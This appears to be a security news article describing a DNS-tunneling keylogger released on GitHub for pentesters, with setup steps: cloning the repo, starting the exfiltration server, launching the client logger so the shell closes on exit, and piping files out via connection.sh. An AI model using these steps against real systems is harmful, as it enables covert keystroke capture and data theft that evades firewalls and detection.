A new keylogging server and client tool have been released on GitHub for pentesters. The tool utilizes DNS tunneling to transmit keystrokes through firewalls, potentially evading detection covertly.
The tool, DNS-Tunnel-Keylogger, was designed for post-exploitation activities for pentesters and emphasizes lightweight exfiltration and persistence to minimize the chances of being discovered by security systems.
The server component of the tool is written in Python 3 and requires the installation of dependencies via pip.
It operates by default on UDP port 53, but users can specify a different port using the -p flag. The server’s IP address is used in SOA and NS records to enable other nameservers to locate the server.
Users are instructed to set their domain’s namespace to custom DNS and point it to the exfiltration server’s IP address, effectively setting glue records.
DNS tunneling is a technique for encoding the data of other programs or protocols in DNS queries and responses.
This can be particularly useful for post-exploitation data extraction while avoiding detection and firewall restrictions.
- Knowledge of DNS and networking concepts
- Familiarity with Python and Bash scripting
- A Linux environment for the keylogger client
- Python3 installed on the server
On the client side, the Linux keylogger consists of two bash scripts. The connection.sh
script is responsible for sending the captured keystrokes to the server, while the logger.sh
script is used to start the keylogging process.
The keylogger can be started silently, and the shell can be closed upon exit to avoid returning to a non-keylogger state.
Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .
The developers note that the keylogger will not run in non-interactive shells and that the Windows Dns_Query_A
function tends to send duplicate requests, although the server is designed to handle this by discarding repeated packets[
DNS Tunnel Keylogger – Server Setup
Step 1: Clone the Repository
First, you need to clone the DNS-Tunnel-Keylogger repository from GitHub:
git clone https://github.com/Geeoon/DNS-Tunnel-Keylogger.git
Step 2: Install Dependencies
Navigate to the cloned directory and install the required Python dependencies:
cd DNS-Tunnel-Keylogger
python3 -m pip install -r requirements.txt
Step 3: Start the Server
To start the server, use the following command:
python3 main.py
Replace
with the IP address of the server and
with the domain that the server is authoritative for.
Server Options:
-h, --help
: Show the help message and exit.-p PORT, --port PORT
: Specify a different port to listen on. By default, the server listens on UDP port 53.
Client Setup (Linux Keylogger)
Step 1: Prepare the Scripts
Ensure that logger.sh
and connection.sh
are in the same directory. These scripts will capture and send the keystrokes to the server.
Step 2: Start the Keylogger
To start the keylogger, execute the following command:
./logger.sh && exit
Replace
with the domain to send data to. The && exit
will close the shell upon exit to prevent returning to a non-keylogged shell.
Keylogger Options:
-p path
: Specify the path to the log file to listen to. By default, this is/tmp/
.-l
: Run the logger with warnings and errors printed, which can be useful for debugging.
Additional Information
Manual Data Transmission
If you wish to send data, such as a file, manually, you can pipe the data to the connection.sh
script, which will establish a connection and send the data.
Security Considerations
If used without proper authorization, a keylogger and DNS tunneling can be considered malicious and illegal in many jurisdictions. Ensure you can use these tools in your environment and comply with all relevant laws and ethical guidelines.
Troubleshooting
- If you encounter issues, remove the
&> /dev/null
from the keylogger command to display error messages. - Check the server’s firewall settings to ensure the DNS port (default 53) is open for incoming and outgoing connections.
- Please verify that the domain used is correctly configured and that the server is set as authoritative for it.
This guide provides the steps to set up a DNS tunneling keylogger for covert keystroke exfiltration. Remember to use this tool responsibly and within the law.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.